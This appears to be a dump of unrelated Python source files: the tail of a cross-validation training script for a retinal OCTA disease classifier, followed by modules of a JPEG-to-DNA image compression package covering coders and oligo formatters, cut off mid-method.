plot_training_acc(h, cfg, save=True)
# Now perform prediction
train_set_score = model_curr.evaluate(Xs[0], ys[0], callbacks=callbacks_curr, verbose=0)
valid_set_score = model_curr.evaluate(Xs[1], ys[1], callbacks=callbacks_curr, verbose=0)
test_set_score = model_curr.evaluate(Xs[2], ys[2], callbacks=callbacks_curr, verbose=0)
print("\nTrain set accuracy: {}".format(train_set_score[1]))
print("Valid set accuracy: {}".format(valid_set_score[1]))
print("Test set accuracy: {}".format(test_set_score[1]))
cfg.vec_acc = [train_set_score[1], valid_set_score[1], test_set_score[1]]
if cfg.num_classes == 2:
# make predictions for test set
y_true = ys[-1]
y_pred_logits = model_curr.predict(Xs[2])
y_pred = y_pred_logits.copy()
y_pred[y_pred >= 0.5] = 1
y_pred[y_pred < 0.5] = 0
y_pred = y_pred.reshape(-1)
# now transform the logits into a matrix of two class probabilities and append
y_pred_logits = np.concatenate([1 - y_pred_logits, y_pred_logits], axis=1)
# make predictions for validation set
y_valid_true = ys[1]
y_valid_pred_logits = model_curr.predict(Xs[1])
y_valid_pred = y_valid_pred_logits.copy()
y_valid_pred[y_valid_pred >= 0.5] = 1
y_valid_pred[y_valid_pred < 0.5] = 0
y_valid_pred = y_valid_pred.reshape(-1)
            # now transform the logits into two class probabilities and append them for the validation set
y_valid_pred_logits = np.concatenate([1 - y_valid_pred_logits, y_valid_pred_logits], axis=1)
else:
# make the predictions for the test set
y_true = np.argmax(ys[-1], axis=1)
y_pred = np.argmax(model_curr.predict(Xs[2]), axis=1)
y_pred_logits = model_curr.predict(Xs[2])
# make the predictions for the validation set
y_valid_true = np.argmax(ys[1], axis=1)
y_valid_pred = np.argmax(model_curr.predict(Xs[1]), axis=1)
y_valid_pred_logits = model_curr.predict(Xs[1])
# plot the confusion matrices
plot_raw_conf_matrix(y_true, y_pred, cfg, save=True)
plot_norm_conf_matrix(y_true, y_pred, cfg, save=True)
# now append the results to a list
vec_y_true.append(y_true)
vec_y_pred.append(y_pred)
vec_y_pred_prob.append(y_pred_logits)
# append the results from the validation set also
vec_y_valid_true.append(y_valid_true)
vec_y_valid_pred.append(y_valid_pred)
vec_y_valid_pred_prob.append(y_valid_pred_logits)
# Now we are outside of the loop
y_true_unsorted_all = np.concatenate(vec_y_true, axis=-1)
y_pred_unsorted_all = np.concatenate(vec_y_pred, axis=-1)
y_pred_prob_unsorted_all = np.concatenate(vec_y_pred_prob, axis=0)
# Now obtain the correct indices
vec_idx_absolute_test_all = []
for idx_fold in range(len(vec_Xs)):
vec_idx_test_curr = cfg.vec_idx_absolute[idx_fold][-1]
vec_idx_absolute_test_all.append(vec_idx_test_curr)
vec_idx_absolute_test_all = np.concatenate(vec_idx_absolute_test_all, -1)
# Now get all the test set data
idx_permutation_sort = np.argsort(vec_idx_absolute_test_all)
y_true_all = y_true_unsorted_all[idx_permutation_sort]
y_pred_all = y_pred_unsorted_all[idx_permutation_sort]
y_pred_prob_all = y_pred_prob_unsorted_all[idx_permutation_sort, ...]
cfg.y_test_true = y_true_all
cfg.y_test_pred = y_pred_all
cfg.y_test_pred_prob = y_pred_prob_all
# also generate the data for the validation set predictions
y_valid_true_unsorted_all = np.concatenate(vec_y_valid_true, axis=-1)
y_valid_pred_unsorted_all = np.concatenate(vec_y_valid_pred, axis=-1)
y_valid_pred_prob_unsorted_all = np.concatenate(vec_y_valid_pred_prob, axis=0)
cfg.y_valid_true = y_valid_true_unsorted_all
cfg.y_valid_pred = y_valid_pred_unsorted_all
cfg.y_valid_pred_prob = y_valid_pred_prob_unsorted_all
test_acc_full = np.sum(y_true_all == y_pred_all) / len(y_true_all)
print("\nOverall accuracy: {}".format(test_acc_full))
cfg.test_acc_full = test_acc_full
# Print out the patient IDs corresponding to the query
# Here for example
# if you are running 'disease' label and you set true_label_id = 0 and predicted_label_id = 2
    # then you would get the patients who are normal/healthy but falsely classified as NV AMD
# the true_label_id and predicted_label_id correspond to cfg.vec_str_labels defined above
# print(get_patient_id_by_label(y_true_all, y_pred_all, true_label_id=0, predicted_label_id=2, cfg=cfg))
# you can also print multiple of these at the same time
# print(get_patient_id_by_label(y_true_all, y_pred_all, true_label_id=2, predicted_label_id=1, cfg=cfg))
    # Extra caveat: for feature labels, since we no longer have a 'possible' class and since the classes
    # are automatically recast, to get the FN cases (patient has the feature but network predicts not present)
    # you need to do something like
print(get_patient_id_by_label(y_true_all, y_pred_all, true_label_id=1, predicted_label_id=0, cfg=cfg))
# Plot and save the final result
plot_raw_conf_matrix(y_true_all, y_pred_all, cfg, save=True, cv_all=True)
plot_norm_conf_matrix(y_true_all, y_pred_all, cfg, save=True, cv_all=True)
# append final training history
cfg.vec_history = vec_history
# save the output as a csv file also
save_csv(y_true_all, y_pred_all, cfg)
# save the cfg, which contains configurations and results
save_cfg(cfg, overwrite=True)
# save the mat file, which contains all useful output information
save_mat(cfg, overwrite=True, bool_save_valid=True)
return cfg
if __name__ == '__main__':
# Configuring the files here for now
cfg_template = get_config(filename=pathlib.Path(os.getcwd()).parent / 'config' / 'default_config.yml')
cfg_template.user = 'jyao'
cfg_template.load_mode = 'csv'
cfg_template.overwrite = True
cfg_template = initialize_config_preproc(cfg_template)
# now load the actual cfg generated from the data
vec_idx_patient = [1, 310]
f_cfg_handle = "preproc_cfg_{}_{}.pkl".format(vec_idx_patient[0], vec_idx_patient[1])
f_cfg = cfg_template.d_preproc / f_cfg_handle
with open(str(f_cfg), 'rb') as handle:
cfg = pickle.load(handle)
# name of particular feature that will be used
# note if want to test for disease label then have to specify this to be 'disease'
# otherwise it has to be one of ['IRF/SRF', 'Scar', 'GA', 'CNV', 'Large PED']
cfg.str_feature = 'Scar'
    # whether or not to make the training set balanced - note this will give you an imbalanced test set
cfg.balanced = False
# for CV script then here the cross validation mode should be enabled
cfg.cv_mode = True
# specify model architecture and whether to use debug mode
cfg.str_arch = 'arch_022'
cfg.debug_mode = True
# now load the preprocessed data and the label
f_data_handle = "preproc_data_{}_{}.pkl".format(vec_idx_patient[0], vec_idx_patient[1])
f_data = cfg_template.d_preproc / f_data_handle
with open(str(f_data), 'rb') as handle:
X = pickle.load(handle)
y = generate_labels(cfg.str_feature, cfg, bool_append_csv_to_cfg=True)
# now prepare data for training
cfg = initialize_config_split(cfg)
X, y = correct_data_label(X, y, cfg)
vec_Xs, vec_ys = prepare_data_for_train_cv(X, y, cfg)
# finally set the training parameters
cfg = initialize_config_training(cfg, bool_debug=cfg.debug_mode)
cfg = run_training_cv(vec_Xs, vec_ys, cfg)
```
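The cross-validation aggregation above concatenates per-fold test predictions and then uses `np.argsort` on the absolute patient indices to restore the original patient order. A minimal sketch with made-up fold outputs (the arrays stand in for `vec_y_pred` and `cfg.vec_idx_absolute`):

```python
import numpy as np

# hypothetical per-fold test predictions and their absolute patient indices
vec_y_pred = [np.array([1, 0]), np.array([0, 1])]
vec_idx_absolute_test = [np.array([2, 0]), np.array([3, 1])]

y_pred_unsorted = np.concatenate(vec_y_pred, axis=-1)      # [1, 0, 0, 1]
idx_all = np.concatenate(vec_idx_absolute_test, axis=-1)   # [2, 0, 3, 1]

# argsort gives the permutation that restores ascending patient order
perm = np.argsort(idx_all)
y_pred_sorted = y_pred_unsorted[perm]
print(y_pred_sorted)                                       # [0 1 1 0] -> predictions for patients 0..3
```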
#### File: amd_octa/utils/context_management.py
```python
import contextlib
import numpy as np
@ contextlib.contextmanager
def temp_seed(seed):
"""
    Context manager that temporarily sets the NumPy random state. It is used to ensure that
    splitting the data is always performed with the same random seed (20194040) while the rest of
    the script is not affected by that random state
:param seed: Desired random seed to be used
"""
# Obtain the old random seed
state = np.random.get_state()
# Set the np random seed in the current environment to the desired seed number
np.random.seed(seed)
try:
yield
finally:
        # Restore the previous random state when leaving the context
np.random.set_state(state)
``` |
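A short usage sketch of `temp_seed`: draws inside the `with` block are reproducible, while the global NumPy random state outside the block is left untouched.

```python
import numpy as np
# temp_seed as defined above (amd_octa/utils/context_management.py)

with temp_seed(20194040):
    idx_a = np.random.permutation(10)
with temp_seed(20194040):
    idx_b = np.random.permutation(10)
assert (idx_a == idx_b).all()  # the split is reproducible

# outside the context the previous global state is restored,
# so unrelated code keeps its own randomness
print(np.random.rand())
```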
{
"source": "Jiaanzhu/Image-compression-for-DNA-storage",
"score": 3
} |
#### File: jpegdna/coders/hexcoder.py
```python
from jpegdna.coders import AbstractCoder
class HexCoder(AbstractCoder):
"""Hexadecimal coder"""
def encode(self, inp):
if inp < 0:
return "err"
return hex(inp)[2:].upper()
def decode(self, code):
return int("0x"+code.lower(), 0)
```
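A quick round-trip with `HexCoder` (inputs are plain non-negative integers; negative inputs return the `"err"` sentinel):

```python
from jpegdna.coders import HexCoder

coder = HexCoder()
code = coder.encode(255)      # "FF"
value = coder.decode("FF")    # 255
assert value == 255
assert coder.encode(-1) == "err"
```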
#### File: jpegdna/coders/__init__.py
```python
from abc import ABC, abstractmethod
# pylint: disable=missing-class-docstring
class AutomataException(Exception):
pass
class AutomataGetterException(AutomataException):
pass
class AutomataGetterExceptionEncode(AutomataGetterException):
pass
class AutomataGetterExceptionDecode(AutomataGetterException):
pass
class AutomataSetterException(AutomataException):
pass
class AutomataSetterExceptionEncode(AutomataSetterException):
pass
class AutomataSetterExceptionDecode(AutomataSetterException):
pass
# pylint: enable=missing-class-docstring
class AbstractCoder(ABC):
"""Abstract class for codec definition"""
def set_state(self, *args, case=None) -> None:
"""Helper method to set the state of the codec if necessary"""
def get_state(self, case=None) -> any:
"""Helper method to get the state of the codec if necessary"""
def full_encode(self, inp, *args):
"""Encoding method
:param inp: Input to encode
:type inp: list|str
:param args: Encoding arguments
:type args: any
:return: Encoded message, encoding state
:rtype: list|str, any
"""
@abstractmethod
def encode(self, inp):
"""Encoding method
:param inp: Input to encode
:type inp: list|str
:return: Encoded message
:rtype: list|str
"""
def full_decode(self, code, *args):
"""Encoding method
:param code: Input to decode
:type code: list|str
:param args: Decoding arguments
:type args: any
:return: Decoded message, decoding state
:rtype: list|str, any
"""
@abstractmethod
def decode(self, code):
"""Decoding method
:param code: Input to decode
:type code: list|str
:return: Decoded message
:rtype: list|str
"""
# pylint: disable=wrong-import-position
from jpegdna.coders.huffmancoder import HuffmanCoder
from jpegdna.coders.goldmancoder import GoldmanCoder, GoldmanCoderDNA, NonDecodableGoldman
from jpegdna.coders.hexcoder import HexCoder
from jpegdna.coders.categorycoder import ACCategoryCoder, DCCategoryCoder, NonDecodableCategory
from jpegdna.coders.valuecoder import ValueCoder
from jpegdna.coders.coefficientcoder import ACCoefficientCoder, DCCoefficientCoder
```
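A minimal concrete coder illustrating the `AbstractCoder` contract sketched above: only `encode` and `decode` are abstract, while `set_state`/`get_state` and the `full_*` variants are optional hooks. This class is only an illustration, not part of the package.

```python
from jpegdna.coders import AbstractCoder

class IdentityCoder(AbstractCoder):
    """Trivial coder that returns its input unchanged."""
    def encode(self, inp):
        return inp
    def decode(self, code):
        return code

coder = IdentityCoder()
assert coder.decode(coder.encode("ATCG")) == "ATCG"
```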
#### File: jpegdna/coders/valuecoder.py
```python
import numpy as np
from jpegdna.coders import AbstractCoder
from jpegdna.coders import AutomataGetterException, AutomataSetterException, AutomataSetterExceptionEncode, AutomataSetterExceptionDecode
def get_codebook(ad_bits, codebook):
"""Returns the exhaustive codebooks for a given codeword length
:param ad_bits: codewor length
:type ad_bits: int
:return: Codebook
:rtype: list(str)
"""
return codebook[ad_bits-2]
def compute_min_value(ad_bits):
"""Compute the min value for the codebook with codewords of length ad_bits
:param ad_bits: codeword length
:type ad_bits: int
:return: min value
:rtype: int
"""
tab = [0, None, 1, 6, 18, 83, 376, 1264, 5263, 17580, 72910]
return tab[ad_bits]
def compute_max_value(ad_bits):
"""Compute the max value for the codebook with codewords of length ad_bits
:param ad_bits: codeword length
:type ad_bits: int
:return: max value
:rtype: int
"""
tab = [0, None, 5, 17, 82, 375, 1263, 5262, 17579, 72909, 305276]
return tab[ad_bits]
class ValueCoder(AbstractCoder):
"""Value Coder
    :ivar verbose: Verbosity enabler
    :vartype verbose: bool
:ivar category: category in which belongs the value
:vartype category: int
:ivar ad_bits: length of the word coding the value
:vartype ad_bits: int
"""
def __init__(self, codebook, verbose=False):
self.category = 0
self.ad_bits = 0
self.code_length = 0
self.verbose = verbose
self.codebook = codebook
def set_state(self, *args, case=None):
"""Sets the state for the decoding"""
if len(args) == 1 and case == 'encode':
self.category = args[0]
elif case == 'encode':
raise AutomataSetterExceptionEncode(f"ValueCoder: Invalid number of parameters, 1 expected, {len(args)} given.")
elif len(args) == 2 and case == 'decode':
self.ad_bits = args[0]
self.code_length = args[1]
elif case == 'decode':
raise AutomataSetterExceptionDecode(f"ValueCoder: Invalid number of parameters, 2 expected, {len(args)} given.")
else:
raise AutomataSetterException("ValueCoder: Invalid parameters, expected case parameter in {'encode'|'decode'}" +
f" but got {case}")
def get_state(self, case=None):
"""Return new state after encoding
:return: The number of bits it took in the stream and
the length of the codeword for this category
:rtype: int, int
"""
if case is not None and case != 'encode' and case != 'decode':
raise AutomataGetterException("ValueCoder: Invalid parameter, expected case parameter in {None|'encode'|'decode'}" +
f" but got {case}")
return self.ad_bits, self.code_length
def full_encode(self, inp, *args):
self.set_state(*args, case='encode')
return self.encode(inp)
def encode(self, inp):
"""Encode a value according to a category
:param inp: value to be encoded
:type inp: int
"""
if self.category == -1:
raise ValueError("ValueCoder: Invalid value, out of range, category = -1")
if self.category == 0:
self.ad_bits = 0
return ""
else:
self.ad_bits = self.category+1
codebook = get_codebook(self.ad_bits, self.codebook)
#TODO Prepare code for new codebooks
min_val = compute_min_value(self.ad_bits)
if inp > 0:
# print((inp, min_val, self.ad_bits, len(codebook), (inp-min_val)))
# print(inp-min_val)
encoded = codebook[(inp-min_val)]
else:
# print((inp, min_val, self.ad_bits, len(codebook), (-abs(inp)-min_val)))
# print(-(abs(inp)-min_val) - 1)
encoded = codebook[-(abs(inp)-min_val) - 1]
return encoded
def full_decode(self, code, *args):
self.set_state(*args, case='decode')
return self.decode(code)
def decode(self, code):
"""Decode a value
:param code: Sequence to be decoded
:type code: str
"""
if self.ad_bits == 0:
return 0
codebook = get_codebook(self.ad_bits, self.codebook)
code_value = code[self.code_length:self.code_length+self.ad_bits]
idx = np.nonzero(np.in1d(codebook, code_value))
try:
idx = idx[0][0]
        except IndexError:
            return 0  # Codeword not directly decodable because not in the codebook
min_val, max_val = compute_min_value(self.ad_bits), compute_max_value(self.ad_bits)
vecpos = list(range(min_val, max_val+1))
vecneg = list(range(-max_val, -min_val+1))
vec = vecpos + vecneg
# print(vecpos)
# print(vecneg)
# print(len(vec))
# print(vec)
return vec[idx]
```
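The lookup tables in `compute_min_value` and `compute_max_value` imply the absolute value range each codeword length can represent; for instance, length-2 codewords cover values 1-5 and length-3 codewords cover 6-17:

```python
from jpegdna.coders.valuecoder import compute_min_value, compute_max_value

for ad_bits in range(2, 6):
    lo = compute_min_value(ad_bits)
    hi = compute_max_value(ad_bits)
    print(f"codeword length {ad_bits}: |value| in [{lo}, {hi}]")
# codeword length 2: |value| in [1, 5]
# codeword length 3: |value| in [6, 17]
# codeword length 4: |value| in [18, 82]
# codeword length 5: |value| in [83, 375]
```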
#### File: jpegdna/format/generalinfoformatter.py
```python
from pathlib import Path
import numpy as np
import jpegdna
from jpegdna.format import AbstractFormatter
from jpegdna.tools.strand_tools import generate_random_strand, compute_length
from jpegdna.tools.loader import load_codebook_matrix
from jpegdna.transforms import ChannelSampler
class GeneralInfoFormatter(AbstractFormatter):
"""Formatter for the general information related to the compression
:ivar alpha: alpha value of the compression, if it is known
:type alpha: float
:ivar freq_origin: origin of the frequencies ("default" or "from_img")
:type freq_origin: str
:ivar m: first dimension of the image
:type m: int
:ivar n: second dimension of the image
:type n: int
:ivar blockdims: dimensions of the block used for DCT
:type blockdims: tuple
:ivar max_cat: max value for the categories
:type max_cat: int
:ivar max_runcat: max value for the run/categories
:type max_runcat: int
:ivar dc_freq_len: codeword length for encoding the dc frequencies
:type dc_freq_len: int
:ivar ac_freq_len: codeword length for encoding the ac frequencies
:type ac_freq_len: int
:ivar oligo_length: Size of the oligos used for formatting
:type oligo_length: int
"""
IMAGE_TYPES = ["gray", "RGB"]
def __init__(self, alpha, freq_origin, m, n, blockdims, max_cat, max_runcat, dc_freq_len, ac_freq_len, image_type, sampler, header, oligo_length=200, debug=False):
self.alpha = alpha
self.freq_origin = freq_origin
self.m, self.n = m, n
self.oligo_length = oligo_length
if debug:
self.general_info_header = "\033[33m" + header + "\033[0m"
else:
self.general_info_header = header
self.header_len = len(header)
self.barcodes = ['AATTC',
'AAGAG',
'ATAAC',
'ACCTG',
'TTATG',
'TCTCG',
'TGCAG',
'CCACA',
'CGTTG',
'GGATC']
self.blockdims = blockdims
self.max_cat = max_cat
self.max_runcat = max_runcat
self.dc_freq_len = dc_freq_len
self.ac_freq_len = ac_freq_len
self.codebook = load_codebook_matrix(Path(jpegdna.__path__[0] + "/data/codebook.pkl"))
self.debug = debug
if image_type is not None:
self.image_type = self.IMAGE_TYPES.index(image_type)
else:
self.image_type = None
self.sampler = sampler
# self.samplers = list(set([el[25:].replace("_", ":") for el in dir(ChannelSampler) if "_ChannelSampler__" in el]))
self.samplers = ['4:2:0', '4:2:2', '4:1:1', '4:4:0', '4:4:4']
if self.sampler is not None:
self.channel_sampler = ChannelSampler(sampler=self.sampler)
else:
self.channel_sampler = None
def colored_image(self):
"""Check if image is colored or gray level
:rtype: bool
"""
return self.image_type == 1
def format(self, inp):
if inp is not None:
raise ValueError
data_payload_length = self.oligo_length
n_rows, n_cols = self.m, self.n
alpha = round(self.alpha, 3)
blockdims = self.blockdims
max_cat, max_runcat = self.max_cat, self.max_runcat
int_alpha = int(alpha)
float_alpha = alpha - int_alpha
if self.debug:
oligo = (self.general_info_header +
"\033[31m" + self.barcodes[blockdims[0]] + self.barcodes[blockdims[1]] +
"\033[32m" + self.barcodes[n_rows//1000] + self.barcodes[(n_rows%1000)//100] + self.barcodes[(n_rows%100)//10] + self.barcodes[n_rows%10] +
"\033[31m" + self.barcodes[n_cols//1000] + self.barcodes[(n_cols%1000)//100] + self.barcodes[(n_cols%100)//10] + self.barcodes[n_cols%10] +
"\033[32m" + self.barcodes[max_cat//10] + self.barcodes[max_cat%10] +
"\033[31m" + self.barcodes[max_runcat//100] + self.barcodes[(max_runcat%100)//10] + self.barcodes[max_runcat%10] +
"\033[32m" + self.barcodes[self.dc_freq_len] +
"\033[31m" + self.barcodes[self.ac_freq_len//10] + self.barcodes[self.ac_freq_len%10] +
"\033[32m" + self.barcodes[int_alpha] +
"\033[31m" + self.barcodes[int((float_alpha*10)%10)] +
"\033[31m" + self.barcodes[int((float_alpha*100)%10)] +
"\033[31m" + self.barcodes[int((float_alpha*1000)%10)] +
"\033[31m" + self.barcodes[self.image_type] + "\033[0m")
else:
oligo = (self.general_info_header +
self.barcodes[blockdims[0]] + self.barcodes[blockdims[1]] +
self.barcodes[n_rows//1000] + self.barcodes[(n_rows%1000)//100] + self.barcodes[(n_rows%100)//10] + self.barcodes[n_rows%10] +
self.barcodes[n_cols//1000] + self.barcodes[(n_cols%1000)//100] + self.barcodes[(n_cols%100)//10] + self.barcodes[n_cols%10] +
self.barcodes[max_cat//10] + self.barcodes[max_cat%10] +
self.barcodes[max_runcat//100] + self.barcodes[(max_runcat%100)//10] + self.barcodes[max_runcat%10] +
self.barcodes[self.dc_freq_len] +
self.barcodes[self.ac_freq_len//10] + self.barcodes[self.ac_freq_len%10] +
self.barcodes[int_alpha] +
self.barcodes[int((float_alpha*10)%10)] +
self.barcodes[int((float_alpha*100)%10)] +
self.barcodes[int((float_alpha*1000)%10)] +
self.barcodes[self.image_type])
if self.colored_image():
oligo += self.barcodes[self.samplers.index(self.sampler)]
ind = -1
while oligo[ind] not in ["A", "T", "C", "G"]:
ind -= 1
before = oligo[ind]
if self.debug:
return oligo + "\033[30;47m" + generate_random_strand(data_payload_length-compute_length(oligo)+self.header_len, before, "A") + "\033[0;37;40m"
else:
return oligo + generate_random_strand(data_payload_length-len(oligo)+self.header_len, before, "A")
def deformat(self, oligos):
oligo = oligos
reading_head = 0
self.blockdims = (self.barcodes.index(oligo[reading_head:reading_head+5]), self.barcodes.index(oligo[reading_head+5:reading_head+10]))
reading_head += 10
self.m = (self.barcodes.index(oligo[reading_head:reading_head+5]) * 1000 +
self.barcodes.index(oligo[reading_head+5:reading_head+10]) * 100 +
self.barcodes.index(oligo[reading_head+10:reading_head+15]) * 10 +
self.barcodes.index(oligo[reading_head+15:reading_head+20]))
reading_head += 20
self.n = (self.barcodes.index(oligo[reading_head:reading_head+5]) * 1000 +
self.barcodes.index(oligo[reading_head+5:reading_head+10]) * 100 +
self.barcodes.index(oligo[reading_head+10:reading_head+15]) * 10 +
self.barcodes.index(oligo[reading_head+15:reading_head+20]))
reading_head += 20
self.max_cat = (self.barcodes.index(oligo[reading_head:reading_head+5]) * 10 +
self.barcodes.index(oligo[reading_head+5:reading_head+10]))
reading_head += 10
self.max_runcat = (self.barcodes.index(oligo[reading_head:reading_head+5]) * 100 +
self.barcodes.index(oligo[reading_head+5:reading_head+10]) * 10 +
self.barcodes.index(oligo[reading_head+10:reading_head+15]))
reading_head += 15
self.dc_freq_len = self.barcodes.index(oligo[reading_head:reading_head+5])
reading_head += 5
self.ac_freq_len = (self.barcodes.index(oligo[reading_head:reading_head+5]) * 10 +
self.barcodes.index(oligo[reading_head+5:reading_head+10]))
if self.dc_freq_len == 0 and self.ac_freq_len == 0:
self.freq_origin = "default"
else:
self.freq_origin = "from_img"
reading_head += 10
self.alpha = (self.barcodes.index(oligo[reading_head:reading_head+5]) +
self.barcodes.index(oligo[reading_head+5:reading_head+10]) / 10 +
self.barcodes.index(oligo[reading_head+10:reading_head+15]) / 100 +
self.barcodes.index(oligo[reading_head+15:reading_head+20]) / 1000)
reading_head += 20
self.image_type = self.barcodes.index(oligo[reading_head:reading_head+5])
reading_head += 5
if self.colored_image():
self.sampler = self.samplers[self.barcodes.index(oligo[reading_head:reading_head+5])]
res = self.channel_sampler.forward((np.zeros((self.n, self.m, 3))))
self.m, self.n = [None, None, None], [None, None, None]
self.n[0], self.m[0] = res[0].shape
self.n[1], self.m[1] = res[1].shape
self.n[2], self.m[2] = res[2].shape
self.m = tuple(self.m)
self.n = tuple(self.n)
if self.debug:
print(f"Block dimensions: {self.blockdims}")
print(f"Image size: {(self.m, self.n)}")
print(f"(max_cat, max_runcat): {(self.max_cat, self.max_runcat)}")
print(f"(dc_freq_len, ac_freq_len): {((self.dc_freq_len, self.ac_freq_len))}")
print(f"alpha: {self.alpha}")
```
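A small sketch of the barcode scheme used by `GeneralInfoFormatter`: each decimal digit of a header field is mapped to one of the ten 5-nt barcodes, so an image height of 512, for example, becomes four barcodes for the digits 0, 5, 1 and 2. Decoding mirrors `deformat` by reading the strand five nucleotides at a time.

```python
barcodes = ['AATTC', 'AAGAG', 'ATAAC', 'ACCTG', 'TTATG',
            'TCTCG', 'TGCAG', 'CCACA', 'CGTTG', 'GGATC']

n_rows = 512
encoded = (barcodes[n_rows // 1000] + barcodes[(n_rows % 1000) // 100] +
           barcodes[(n_rows % 100) // 10] + barcodes[n_rows % 10])
print(encoded)  # AATTC + TCTCG + AAGAG + ATAAC (digits 0, 5, 1, 2)

# decoding: read 5 nt at a time and rebuild the decimal number
digits = [barcodes.index(encoded[i:i + 5]) for i in range(0, 20, 5)]
decoded = digits[0] * 1000 + digits[1] * 100 + digits[2] * 10 + digits[3]
assert decoded == n_rows
```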
#### File: jpegdna/format/jpegdnaformatter.py
```python
from jpegdna.format import AbstractFormatter, GeneralInfoFormatter, GrayFrequenciesFormatter, RGBFrequenciesFormatter, DataFormatter
from jpegdna.tools.strand_tools import compute_length
class JpegDNAFormatter(AbstractFormatter):
"""Jpeg DNA gray level formatter class
    :param alpha: Alpha value (quantization step multiplier)
:type alpha: float
:param freq_origin: Choose between default and adapted frequencies
:type freq_origin: str
:param primer: Primer name used
:type primer: str
"""
DEFAULT_DC_FRQ_LEN = 7
DEFAULT_AC_FREQ_LEN = 10
DEFAULT_MAX_CAT = 11
DEFAULT_MAX_RUNCAT = 162
DEFAULT_BLOCKDIMS = (8, 8)
DEFAULT_CENTERING_OFFSET = 75
DEFAULT_GENERAL_INFO_HEADER = "AATAATA"
DEFAULT_FREQS_INFO_HEADER = "ATCCGTC"
DEFAULT_DATA_INFO_HEADER = "TTGAGGA"
DEFAULT_DC_FREQ_HEADER = "ATTC"
DEFAULT_AC_FREQ_HEADER = "AGAG"
PRIMERS = {
"none" : ("", ""),
"illumina" : ("GTTCAGAGTTCTACAGTCCGACGATC", "TGGAATTCTCGGGTGCCAAGG")
}
PRIMER_LENGTHS = {
"none" : (0, 0),
"illumina" : (26, 21)
}
def __init__(self, alpha, image_type, sampler="4:2:2", freq_origin=None, primer="illumina", oligo_length=200, debug=False):
self.debug = debug
self.primer = None
self.primer_type = primer
self.set_primer()
self.alpha = alpha
self.freq_dc, self.freq_ac, self.m, self.n = None, None, None, None
self.oligo_length = oligo_length
if debug:
self.general_info_header = "\033[33m" + self.DEFAULT_GENERAL_INFO_HEADER + "\033[0m"
self.freqs_info_header = "\033[33m" + self.DEFAULT_FREQS_INFO_HEADER + "\033[0m"
self.data_info_header = "\033[33m" + self.DEFAULT_DATA_INFO_HEADER + "\033[0m"
self.dc_freq_header = "\033[32m" + self.DEFAULT_DC_FREQ_HEADER + "\033[36m"
self.ac_freq_header = "\033[32m" + self.DEFAULT_AC_FREQ_HEADER + "\033[36m"
else:
self.general_info_header = self.DEFAULT_GENERAL_INFO_HEADER
self.freqs_info_header = self.DEFAULT_FREQS_INFO_HEADER
self.data_info_header = self.DEFAULT_DATA_INFO_HEADER
self.dc_freq_header = self.DEFAULT_DC_FREQ_HEADER
self.ac_freq_header = self.DEFAULT_AC_FREQ_HEADER
self.general_info_header_len = len(self.DEFAULT_GENERAL_INFO_HEADER)
self.freqs_info_header_len = len(self.DEFAULT_FREQS_INFO_HEADER)
self.data_info_header_len = len(self.DEFAULT_DATA_INFO_HEADER)
self.freq_type_header_len = len(self.DEFAULT_AC_FREQ_HEADER)
self.image_id = "AATTC"
self.image_id_len = len(self.image_id)
self.parity_len = 4
self.sense_len = 2
self.blockdims = self.DEFAULT_BLOCKDIMS
self.freq_origin = freq_origin
if self.freq_origin == "from_img":
self.dc_freq_len = self.DEFAULT_DC_FRQ_LEN
self.ac_freq_len = self.DEFAULT_AC_FREQ_LEN
self.max_cat = self.DEFAULT_MAX_CAT
self.max_runcat = self.DEFAULT_MAX_RUNCAT
elif self.freq_origin == "default" or self.freq_origin == "from_file" or self.freq_origin is None:
self.dc_freq_len = 0
self.ac_freq_len = 0
self.max_cat = 0
self.max_runcat = 0
else:
raise ValueError("Wrong freq_origin parameter")
self.centering_offset = self.DEFAULT_CENTERING_OFFSET
self.image_type = image_type
self.sampler = sampler
self.general_info_formatter = GeneralInfoFormatter(self.alpha,
self.freq_origin,
self.m,
self.n,
self.blockdims,
self.max_cat,
self.max_runcat,
self.dc_freq_len,
self.ac_freq_len,
self.image_type,
self.sampler,
self.DEFAULT_GENERAL_INFO_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.general_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len),
debug=debug)
if self.image_type == "gray":
self.frequency_formatter = GrayFrequenciesFormatter(self.max_cat,
self.max_runcat,
self.dc_freq_len,
self.ac_freq_len,
self.DEFAULT_FREQS_INFO_HEADER,
self.DEFAULT_DC_FREQ_HEADER,
self.DEFAULT_AC_FREQ_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.freqs_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len -
self.freq_type_header_len),
debug=debug)
elif self.image_type == "RGB":
self.DEFAULT_MAX_CAT = 11 * 3 # pylint: disable = invalid-name
self.DEFAULT_MAX_RUNCAT = 162 * 3 # pylint: disable = invalid-name
self.frequency_formatter = RGBFrequenciesFormatter(self.max_cat,
self.max_runcat,
self.dc_freq_len,
self.ac_freq_len,
self.DEFAULT_FREQS_INFO_HEADER,
self.DEFAULT_DC_FREQ_HEADER,
self.DEFAULT_AC_FREQ_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.freqs_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len -
self.freq_type_header_len),
debug=debug)
else:
self.frequency_formatter = None
self.data_formatter = DataFormatter(self.DEFAULT_DATA_INFO_HEADER,
oligo_length=(self.oligo_length -
self.primer_length -
self.data_info_header_len -
self.image_id_len -
self.parity_len -
self.sense_len),
debug=debug)
def set_primer(self):
"""Sets the primer from the primer type"""
self.primer_length = sum(self.PRIMER_LENGTHS[self.primer_type])
try:
if self.debug:
self.primer = ("\033[31m" + self.PRIMERS[self.primer_type][0] + "\033[0m",
"\033[31m" + self.PRIMERS[self.primer_type][1] + "\033[0m")
else:
self.primer = self.PRIMERS[self.primer_type]
except:
raise ValueError("Non-existing primer")
def set_alpha(self, alpha):
"""Set alpha value"""
self.alpha = alpha
self.general_info_formatter.alpha = alpha
def set_freq_origin(self, choice):
"""Set frequency origin"""
if choice in ["from_img", "from_file", "default"]:
self.freq_origin = choice
else:
raise ValueError("Wrong freq origin")
if self.freq_origin == "from_img":
self.dc_freq_len = self.DEFAULT_DC_FRQ_LEN
self.ac_freq_len = self.DEFAULT_AC_FREQ_LEN
self.general_info_formatter.dc_freq_len = self.DEFAULT_DC_FRQ_LEN
self.general_info_formatter.ac_freq_len = self.DEFAULT_AC_FREQ_LEN
self.frequency_formatter.dc_freq_len = self.DEFAULT_DC_FRQ_LEN
self.frequency_formatter.ac_freq_len = self.DEFAULT_AC_FREQ_LEN
elif self.freq_origin == "default" or self.freq_origin == "from_file":
